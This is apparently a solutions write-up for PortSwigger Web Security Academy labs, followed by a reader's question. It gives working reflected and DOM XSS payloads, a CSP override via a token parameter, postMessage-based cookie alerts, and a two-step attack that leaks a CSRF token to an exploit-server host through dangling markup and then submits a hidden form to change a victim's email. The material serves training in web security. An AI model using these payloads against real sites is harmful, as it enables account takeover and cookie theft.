Put this in the exploit server body and 'deliver to victim' (change the host for your lab host):
<iframe src="https://acb41fc71e32c9aa80aab06000f30012.web-security-academy.net/?search=%3Cbody+onresize%3D%22alert%28%27xss%27%29%22%3E" width=300 id="frame" onload="this.width = 500"></iframe>
Step 1: get the CSRF by using the exploit server to deliver the following to the victim (replace lab and exploit server url):
<script>
document.location.href="https://ac931fff1e0e704f80cd2c9100080039.web-security-academy.net/email?email=blag%22%3E%3Ctable%20background=%27https://ace71f031efe70a080702c43015d00b1.web-security-academy.net?"
</script>
The token will show up in the logs.
Step 2: Deliver the following to the victim (replace CSRF and lab server url):
<form method="post" name="evilform" action="https://ac931fff1e0e704f80cd2c9100080039.web-security-academy.net/email/change-email">
<input type="hidden" name="csrf" value="Hd9l1m0c3zWpghPPTcP2XXqFD2wL6M2M" />
<input type="hidden" name="email" value="[email protected]" />
</form>
<script>document.forms['evilform'].submit()</script>
Set the exploit payload to the following (with exploit / standard hosts changed) then deliver to victim:
<form name="evilform" method="post" action="https://ac891fc51f1a9a4480d885df006900f7.web-security-academy.net/email/change-email">
<input type="hidden" id="csrf" name="csrf" value="" />
<input type="hidden" name="email" value="[email protected]" />
</form>
<script>
var token = "name=\"csrf\" value=\"";
if(name.indexOf(token) <= 0) document.location = "https://ac891fc51f1a9a4480d885df006900f7.web-security-academy.net/email?email=test%22%3E%3Ca%20href=%22https://ac411ff51fb79a6080a585620112003f.web-security-academy.net/exploit%22%3EClick%20me!%3C/a%3E%3Cbase%20target=%27blag";
else {
var loc = name.indexOf(token) + token.length;
var csrf = name.substring(loc);
csrf = csrf.substring(0, csrf.indexOf("\""))
document.getElementById('csrf').value = csrf;
document.forms['evilform'].submit(); }
</script>
How does it work? Checks if the current frame's name contains a csrf; if not, the user is redirected to a link to change-email using a reflected XSS that creates a 'click me' link and uses a dangling attack with base->target. Upon clicking the user is sent back to the exploit page where the csrf is extracted and a form is used to change their email.
Just set the url to: https://aca61fea1e9ec7bd80295df8004a0073.web-security-academy.net/?search=%3Cscript%3Ealert(1)%3C/script%3E&token=;%20script-src-elem%20%27unsafe-inline%27
It uses a reflected xss vector in the search box to print a script with alert, and uses the token query string to override the CSP to allow inline script tags.
Deliver this to the victim (with server url changed). Img is used because Script doesnt work with innerHTML:
<iframe src="https://acb51f721fd0b337808c671c00700072.web-security-academy.net" onload="this.contentWindow.postMessage('<img src=blag onerror=alert(document.cookie) />','*')">
Deliver this (with server url changed). Works as you can use javascript: urls in the href, which invokes JS on the current page:
<iframe src="https://ac6e1f531ec5c6f5801a86ee009d00d3.web-security-academy.net" onload="this.contentWindow.postMessage('javascript:alert(document.cookie)//http:','*')">
Deliver this to the victim. Note the use of " to get quotes in the nested javascript. Also with the iframe src, alert(xss) didn't work but alert(document.cookie) did, which is interesting.
<iframe src="https://ac331fd21e7b389f806fa34900380092.web-security-academy.net/" onload="this.contentWindow.postMessage('{"type":"load-channel","url":"javascript:alert(document.cookie)"}','*')" />
Deliver the following. The product page sets the current url to the cookie, then the home page uses this value as part of inner HTML. So I create a url for the product page that includes an escape and a xss image tag to alert the cookie. Worked great :)
Notably, the iframe loads the product page to set the cookie, and once loaded changes the main page to the exploitable page, in a two step manipulation.
<iframe src="https://ac601f521e2338cb80c4a9c0002c00f8.web-security-academy.net/product?productId=1&%27%3E%3Cimg%20src=blag%20onerror=alert(document.cookie)%20/%3E" onload="document.location.href='https://ac601f521e2338cb80c4a9c0002c00f8.web-security-academy.net'" />
Thanks for the write-up... Just started learning about xss not to long ago and I am confused as to why we have to use an exploit server to complete it and why it doesn't run directly through the site. Thanks in advance for your help :)